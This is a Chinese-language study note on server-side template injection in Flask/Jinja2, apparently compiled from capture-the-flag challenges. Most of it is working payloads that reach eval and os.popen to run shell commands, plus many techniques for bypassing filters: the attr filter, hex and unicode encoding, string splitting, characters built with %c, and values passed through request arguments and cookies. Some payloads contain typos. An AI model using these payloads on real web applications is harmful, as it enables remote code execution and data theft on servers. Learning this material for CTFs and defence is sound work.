ssti注入

flask有个明显的特征就是服务器模板，把用户输入的回显到web页面，

一般在用户交互的地方(输入/输出),

这个要用python去构造链子去执行python命令，来getshell。

一般的注入是get型的

如{{7*7}}，{%7*7%}，{#7*7#},还有{%print(7*7)%}.

一般的链子

1

().__class__.__base__.__subclasses__()[140].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")

2

"".__class__.__base__.__subclasses__()[140].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")

3

 {{ config.__class__.__init__.__globals__['os'].popen('cat /flag.txt').read() }}

4

lipsum.__globals.["os"].popen("").read()

flask里的lipsum方法,可以用于得到builtins，而且lipsum.globals含有os模块

globals 使用方式是 函数名.globals 获取function所处空间下可使用的module、方法以及所有变量。

这个注入就跟sql注入一样有许多的过滤

用之前要fuzz一下，用burp

|attr(”__class__”)   ==     .__class__

[]用getitem绕过

_可以用十六进制编码 \x5F

还可以用unicode编码去绕过

用前两种链子

__subcalsses__()[?]的下标如何来的

{{()['__class__'].__bases__[0]['__subclasses__']()}}

获得内置类

用网上找的脚本把类替换一下，跑一下就可以

import json
classes="""
[, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ]
"""
num=0
alllist=[]
result=""
for i in classes:
    if i==">":
        result+=i
        alllist.append(result)
        result=""
    elif i=="\n" or i==",":
        continue
    else:
        result+=i
#寻找要找的类，并返回其索引
for k,v in enumerate(alllist):
    if "warnings.catch_warnings" in v:
        print(str(k)+"--->"+v)
 

解释： 这个下标对应的内置类要是可以执行

也就是找到warnings.catch_warnings的下标，这个类有个eval内置方法就可以执行命令

具体的绕过参考这个

1

过滤 [ ] ' " _

().__class__.__bases__[0].__subclasses__.[166].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat%20flag.txt').read()"),注意pop(0)代表[0]

|attr(request.arg.cla)绕过.__class__

{{(((()|attr(request.args.cla)|attr(request.args.bas)|list).pop(0))|attr(request.args.sub)()).pop(166)|attr(request.args.ini)|attr(request.args.glo)|attr(request.args.geti)(request.args.bui)|attr(request.args.geti)(request.args.ii)(request.args.hh)}}&cla=__class__&bas=__bases__&sub=__subclasses__&ini=__init__&glo=__globals__&bui=__builtins__&hh=__import__('os').popen('ls').read()&ii=eval&geti=__getitem__

2过滤了

'  .  _ class base subclasses request

可以用[]去代替.

py链就为

""["__class__"]["__bases__"][0]["__subclasses__"]()[166]["__init__"]["__globals__"]["__builtins__"]["eval"]("__import__('os').popen("ls /").read()")

再用16进制编码

eval("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x6c\x73\x27\x29\x2e\x72\x65\x61\x64\x28\x29")
which means
eval("__import__('os').popen('ls').read()")

{{""["\x5F\x5Fc"~"lass"~"\x5F\x5F"]["\x5F\x5Fb"~"ases"~"\x5F\x5F"][0]["\x5F\x5Fsubc"~"lasses"~"\x5F\x5F"]()[166]["\x5F\x5Fi"~"nit"~"\x5F\x5F"]["\x5F\x5Fg"~"lobals"~"\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]["eval"]("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x61\x74\x20\x77\x6f\x5f\x74\x61\x5f\x6e\x69\x61\x6e\x67\x5f\x64\x65\x5f\x62\x75\x5f\x73\x68\x69\x5f\x6e\x69\x5f\x64\x65\x5f\x66\x6c\x61\x39\x27\x29\x2e\x72\x65\x61\x64\x28\x29")}}

3

%1d,%1e,%1e,%20,%1f,',*,+, , ,.,<,=,>,_,g,[,],\x,""连续会被过滤 ,{{连续会被过滤 ,request,session,set,for,config,if,slice,会被过滤

{%print(123)%}

可以显示

于是py链

print(().__class__.__base__.__subclasses__()[140].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()"))

去绕过

print(((((((((()|attr("__class__"))|attr("__base__"))|attr("__subclasses__"))()|attr(140))|attr("__init__"))|attr("__globals__")))|attr("get")("__builtins__"))|attr("get")("eval")("__import__('os').popen('ls').read()"))

['__builtins__']
应当是
|attr("get")("__builtins__")
而不仅仅是|attr("__builtins__")
["eval"]同理

__不能用十六进制只能用unicode去编码

print(((((((((()|attr("\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f"))|attr("\u005f\u005f\u0062\u0061\u0073\u0065\u005f\u005f"))|attr("\u005f\u005f\u0073\u0075\u0062\u0063\u006c\u0061\u0073\u0073\u0065\u0073\u005f\u005f"))()|attr(140))|attr("\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f"))|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")))|attr("\u0067\u0065\u0074")("\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f"))|attr("\u0067\u0065\u0074")("\u0065\u0076\u0061\u006c")("\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0070\u006f\u0070\u0065\u006e\u0028\u0027\u006c\u0073\u0027\u0029\u002e\u0072\u0065\u0061\u0064\u0028\u0029"))

4

过滤了
class
ge
tattr
builtins
import
os

{{()['__cla''ss__'].__bases__[0]['__subcl''asses__']()}}发现子类，用上面脚本找出下标

{{()['__cla''ss__'].__bases__[0]['__subcl''asses__']()[117].__init__.__globals__['__buil''tins__']['ev''al']("__im""port__('o''s').po""pen('whoami').read()")}}

构造py链

替换popen即可

5

有的可以用

{%7*7%}来显示

过滤了很多

就可以用

{% set zero = (self|int) %}{% set one = (zero*zero)|int %} {% set two = (zero-one-one)|abs %}{% set four = (twotwo)|int %}{% set five = (twotwotwo)-one-one-one %}{% set three = five-one-one %}{% set nine = (twotwotwo*two-five-one-one) %}{% set seven = (zero-one-one-five)|abs %}{% set space = self|string|min %}{% set point = self|float|string|min %} {% set c = dict(c=aa)|reverse|first %}{% set bfh = self|string|urlencode|first %}{% set bfhc = bfh~c %}{% set slas = bfhc%((four~seven)|int) %}{% set yin = bfhc%((three~nine)|int) %}{% set xhx = bfhc%((nine~five)|int) %}{% set right = bfhc%((four~one)|int) %} {% set left = bfhc%((four~zero)|int) %}{% set but = dict(buil=aa,tins=dd)|join %}{% set imp = dict(imp=aa,ort=dd)|join %} {% set pon = dict(po=aa,pen=dd)|join %}{% set so = dict(o=aa,s=dd)|join %} {% set sl = dict(l=aa,s=dd)|join %} {% set ca = dict(ca=aa,t=dd)|join %}{% set flg = dict(fl=aa,ag=dd)|join %}{% set pa = dict(ap=aa,p=dd)|join %} {% set yp = dict(p=aa,y=dd)|join %}{% set ev = dict(ev=aa,al=dd)|join %} {% set red = dict(re=aa,ad=dd)|join %}{% set bul = xhx~xhx~but~xhx~xhx %} {% set ini = dict(ini=aa,t=bb)|join %}{% set glo = dict(glo=aa,bals=bb)|join %}{% set itm = dict(ite=aa,ms=bb)|join %}{% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~sl~space~slas~yin~right~point~red~left~right %}{% for f,v in (whoami|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %}{% if f == bul %} {% for a,b in (v|attr(itm))() %}{% if a == ev %}{%print(b(pld))%}{% endif %}{% endfor %}{% endif %}{% endfor %}

这个的解释是,先构造所用数字,字母，把空格删掉，只用上面去替换pld的popen里的内容就可以

# 首先构造出所需的数字:

{% set zero = (self|int) %}    # 0, 也可以使用lenght过滤器获取数字
{% set one = (zero**zero)|int %}    # 1
{% set two = (zero-one-one)|abs %}    # 2
{% set four = (two*two)|int %}    # 4
{% set five = (two*two*two)-one-one-one %}    # 5
{% set three = five-one-one %}    # 3
{% set nine = (two*two*two*two-five-one-one) %}    # 9
{% set seven = (zero-one-one-five)|abs %}    # 7

# 构造出所需的各种字符与字符串:

{% set space = self|string|min %}    # 空格
{% set point = self|float|string|min %}    # .

{% set c = dict(c=aa)|reverse|first %}    # 字符 c
{% set bfh = self|string|urlencode|first %}    # 百分号 %
{% set bfhc = bfh~c %}    # 这里构造了%c, 之后可以利用这个%c构造任意字符。~用于字符连接
{% set slas = bfhc%((four~seven)|int) %}    # 使用%c构造斜杠 /
{% set yin = bfhc%((three~nine)|int) %}    # 使用%c构造引号 '
{% set xhx = bfhc%((nine~five)|int) %}    # 使用%c构造下划线 _
{% set right = bfhc%((four~one)|int) %}    # 使用%c构造右括号 )
{% set left = bfhc%((four~zero)|int) %}    # 使用%c构造左括号 (

{% set but = dict(buil=aa,tins=dd)|join %}    # builtins
{% set imp = dict(imp=aa,ort=dd)|join %}    # import
{% set pon = dict(po=aa,pen=dd)|join %}    # popen
{% set so = dict(o=aa,s=dd)|join %}    # os
{% set sl = dict(l=aa,s=dd)|join %}    # ls
{% set ca = dict(ca=aa,t=dd)|join %}    # cat
{% set flg = dict(fl=aa,ag=dd)|join %}    # flag
{% set pa = dict(ap=aa,p=dd)|join %}    # app
{% set yp = dict(p=aa,y=dd)|join %}    # py
{% set ev = dict(ev=aa,al=dd)|join %}    # eval
{% set red = dict(re=aa,ad=dd)|join %}    # read
{% set bul = xhx~xhx~but~xhx~xhx %}    # __builtins__

{% set ini = dict(ini=aa,t=bb)|join %}    # init
{% set glo = dict(glo=aa,bals=bb)|join %}    # globals
{% set itm = dict(ite=aa,ms=bb)|join %}    # items

# 将上面构造的字符或字符串拼接起来构造出 __import__('os').popen('cat /flag').read():

{% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %}

# 然后将上面构造的各种变量添加到SSTI万能payload里面就行了:

{% for f,v in (whoami|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %}    # globals
    {% if f == bul %}
        {% for a,b in (v|attr(itm))() %}    # builtins
            {% if a == ev %}    # eval
                {%print(b(pld))%}    # eval("__import__('os').popen('cat /flag').read()")
            {% endif %}
        {% endfor %}
    {% endif %}
{% endfor %}

6

什么都没过滤

用

{{ config.__class__.__init__.__globals__['os'].popen('cat /flag.txt').read() }}

直接执行就可以

6.

过滤 ' " _ os

?name={{self[request.cookies.c][request.cookies.d][request.cookies.e][request.cookies.f][request.cookies.g].open(request.cookies.z).read()}}

cookie赋值

c=dict;d=_TemplateReferencecontext;e=lipsum;f=globals;g=builtins__;z=/flag

popen才可以执行命令这个是open读取文件的

从[2020安洵杯]赛后以及近期遇到的SSTI总结 – yyz の blog